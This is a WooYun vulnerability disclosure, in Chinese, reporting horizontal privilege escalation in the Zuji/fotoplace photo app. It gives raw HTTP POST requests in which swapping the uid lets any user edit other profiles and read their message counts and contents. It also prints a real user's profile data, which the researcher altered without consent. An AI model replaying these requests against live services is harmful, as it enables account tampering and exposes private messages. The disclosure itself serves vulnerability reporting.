当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145133

漏洞标题:足记APP 多处越权

相关厂商:足记APP

漏洞作者: 小手冰凉

提交时间:2015-10-08 10:23

修复时间:2015-11-22 23:40

公开时间:2015-11-22 23:40

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-08: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

多处平行权限
{"error":"程序猿正在被吊打中...","status":"10001"}
厂商好和谐

详细说明:

老套路 启动应用 抓包,发现多处平行权限,这里看几个比较重要的
平行权限就是:我是用户A,我却能操作用户B的信息,在本例中B是任意用户,也就是我能操作任意用户的信息,包括察看修改。
0x0 篡改任意用户信息 (我都能篡改任意用户的信息了,这还不算"有效的危害证明"吗?)
在手机中修改自己的信息然后抓包,修改其中的UID字段就能随便修改目标用户的信息
随便找一个目标用户ID:19210912(这个不是我的帐号,是从推荐用户里选的一个)修改效果如图,因为修改之前没有截图,这个用户本来的头像是一个女生,名字也被我篡改了。

Screenshot.png

(一不小心把妹子名字改成了,当时只是测试,没想到这个漏洞真存在,不然肯定不会改人家名字"let_high") 

{"data":{"albumCount":"0","allowFound":"1","avatar":"http://dn.fotoplace.cc/81622e8a4c414ffc998073f3c16158bb.jpg","city":"0","createAt":"1429614690000","description":"随便写点什么吧","followerCount":"4606","followingCount":"6","gender":"","isFollowing":"1","likeCount":"29","location":"","newCommentCount":"1","newLikeCount":"49","newMessageCount":"0","newMsgCount":"0","newNoticeCount":"0","newNotifyCount":"6","newTotalCount":"56","postCount":"102","stopbyCount":"0","tagCount":"0","uid":"19210912","userName":"let_high","userSkin":"http://dn.fotoplace.cc/fp3811265.jpg-mb?t=314098","wishCount":"0"},"error":"","status":"0"}


0x1 查询任意用户消息数目(我都能察看任意用户的消息数目了,这还不算"有效的可利用的敏感信息泄露"吗?)
数据包内容如下 

POST /api2/user/user_message_count.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Host: www.fotoplace.cc Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 95 uid=<目标用户ID>&token=<任意合法用户token>&version=2.9


仍然以刚才的妹子为例子 

{"data":{"newCommentCount":"1","newLikeCount":"49","newNoticeCount":"0","newNotifyCount":"6","newTotalCount":"56"},"error":"","status":"0"}

可以看到这个妹子的系统消息或者是个人消息的数目.

0x2 查询任意用户消息内容(我都能察看任意用户的消息内容了,这还不算"有效的可利用的敏感信息泄露"吗?)
数据包如下: 

POST /api2/user/user_get_notice_list.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Host: www.fotoplace.cc Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 107 version=2.9&uid=<目标用户ID>&token=<任意合法用户token>&pageindex=0


这里就是能看到上一步中的妹子的那些消息的具体内容,因为这里可能涉及到隐私,所有不方便展示效果.

漏洞证明:

有效的危害证明 : 0x0
有效的可利用的敏感信息泄露:0x1 0x2

修复方案:

完善权限管理

版权声明:转载请注明来源 小手冰凉@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-08 23:39

厂商回复:

收到,正在处理中.

最新状态:

暂无

漏洞评价:

评价